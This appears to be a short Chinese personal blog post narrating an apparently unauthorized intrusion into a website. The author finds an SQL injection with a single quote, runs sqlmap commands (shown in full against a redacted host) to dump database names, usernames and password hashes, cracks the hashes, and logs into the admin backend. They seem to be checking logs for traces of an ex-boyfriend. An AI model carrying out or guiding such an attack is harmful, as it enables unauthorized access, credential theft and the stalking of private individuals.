从找SQL注入到后台权限

1. 第一次找SQL注入漏洞啊 原来是这样找的:

 

通过在URL数字参数后面加单引号看页面是否报错,判断是否存在注入,运气很好,加了单引号后,页面已经报错了,如上图。

判断注入手段:

http://www.xxx.com/xxx.php?cid=118’

2. 工具验证注射点:

 

用了同事教我的sqlmap来验证注射点,果然很好用

Sqlmap验证:

Sqlmap.py
–u “http://www.xxx.com/xxx.php?cid=118” –p cpid

3. 然后得到数据库名:cn397073:

 

Sqlmap注射出数据库名:

Sqlmap.py
–u “http://www.xxx.com/xxx.php?cid=118” –p cpid --dbs

4. 然后注射出所有用户名:

 

有点小激动,但是找了下没找到跟他相关的用户名,难道不上了?不过看到了最后一个是熟人的名称缩写,虽然没什么用,但好奇也记下了。

Sqlmap注射出库内所有用户名(表名不常见,用了其他办法找到的,不表):

Sqlmap.py
–u “http://www.xxx.com/xxx.php?cid=118” –p cpid –D cn397073 –T xxx –C
username --dump

5. 不管有没有用 都到这步了,先注射出密码进去看看:

 

Sqlmap注射出库内所有密码hash:

Sqlmap.py
–u “http://www.xxx.com/xxx.php?cid=118” –p cpid –D cn397073 –T xxx –C
password --dump

6. 对密码hash解密后得到明文,登陆后台

看了下操作日志,时间习惯不像前男友,只好继续观察,另外后台入口是在网站底部链接里发现的,弱~,后台地址应该写个特殊路径,防止别人知道,显然管理员为了方便自己放在了网站底部,不应该!

 

Tagged:

Comments are closed.